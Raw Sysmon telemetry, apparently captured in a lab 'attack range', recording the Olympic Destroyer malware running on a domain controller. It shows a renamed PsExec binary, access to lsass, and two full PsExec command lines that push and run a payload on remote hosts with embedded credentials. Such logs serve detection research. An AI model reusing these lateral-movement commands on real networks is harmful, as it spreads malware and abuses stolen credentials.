10:56:49.898{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.913{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.898{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A805-000000003802}5588C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.898{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.882{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.882{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.882{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.845{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A705-000000003802}1972C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.845{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A705-000000003802}1972C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.829{C8EA50B7-12F1-6216-A705-000000003802}19724652C:\Windows\system32\conhost.exe{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.814{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.814{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A705-000000003802}1972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.798{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.798{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A705-000000003802}1972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.798{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFBECED2641266F090914AB640227A3B,SHA256=69F33415D4AB25E8106C35A664F095588EF9F1119C479859A5C31EEEEBB86310,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.798{C8EA50B7-12E6-6216-4B05-000000003802}67926964C:\Temp\olympic_destroyer.exe{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.805{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.798{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12F1-6216-A605-000000003802}844C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.798{C8EA50B7-12EA-6216-5505-000000003802}6148C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 534500x8000000000000000291513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.729{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:49.714{C8EA50B7-12F1-6216-A205-000000003802}400C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.682{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F1-6216-A505-000000003802}3356C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.682{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A405-000000003802}6380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:49.682{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12F1-6216-A405-000000003802}6380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 